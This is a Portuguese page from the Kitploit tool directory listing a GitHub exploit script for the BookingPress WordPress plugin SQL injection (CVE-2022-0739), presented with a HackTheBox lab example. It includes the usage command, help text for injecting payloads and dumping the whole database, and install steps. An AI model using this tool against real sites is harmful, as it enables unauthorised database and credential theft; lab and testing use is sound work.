Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-0739 — Exploit para WP BookingPress (< 1.0.11) baseado no POC do destr4ct. | Kitploit
Ferramentas/GitHubGitHub/viardant/cve-2022-0739
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubviardant/cve-2022-0739

CVE-2022-0739

Exploit para WP BookingPress (< 1.0.11) baseado no POC do destr4ct.

Ver Repositório
4há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-0739

Minha abordagem do exploit CVE-2022-0739 BookingPress, baseada no POC do destr4ct — apenas mais bonita.

Exemplo

Exemplo de uso contra a máquina MetaTwo do HackTheBox, que hospeda um WordPress com o plugin bookingpress vulnerável (versão 1.0.10).

root@kitploit:~
python booking-sqlinjector.py -u http://metapress.htb -nu http://metapress.htb/events/ -a -o db_dump

asciicast

Uso

root@kitploit:~
usage: booking-sqlinjector.py [-h] -u URL [-o BASENAME] [-p PAYLOAD] [-a] [-v] (-n NONCE | -nu NONCE_URL)

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL of WordPress server with vulnerable plugin (http://example.domain)
  -o BASENAME, --out BASENAME
                        Output database schema and dump in JSON format
  -p PAYLOAD, --payload PAYLOAD
                        Payload to inject. Should start with ')'
  -a, --dump-all        Enables whole DB dump
  -v, --verbose         Enables verbose mode
  -n NONCE, --nonce NONCE
                        Nonce that you got as unauthenticated user
  -nu NONCE_URL, --nonce-url NONCE_URL
                        URL where nonce can be extracted (bookingprss form page)

Instalação

root@kitploit:~
git clone https://github.com/viardant/CVE-2022-0739
cd CVE-2022-0739
pip install -r requirements.txt

Aviso legal

TL:DR; Apenas para fins educacionais, não quebre coisas que você não possui ou não tem permissão para testar. Se você usar este programa para qualquer propósito nefasto, os deuses da cibersegurança podem castigar seu computador com um malware tão devastador que você vai desejar ter comprado um Mac.

Baixar ferramenta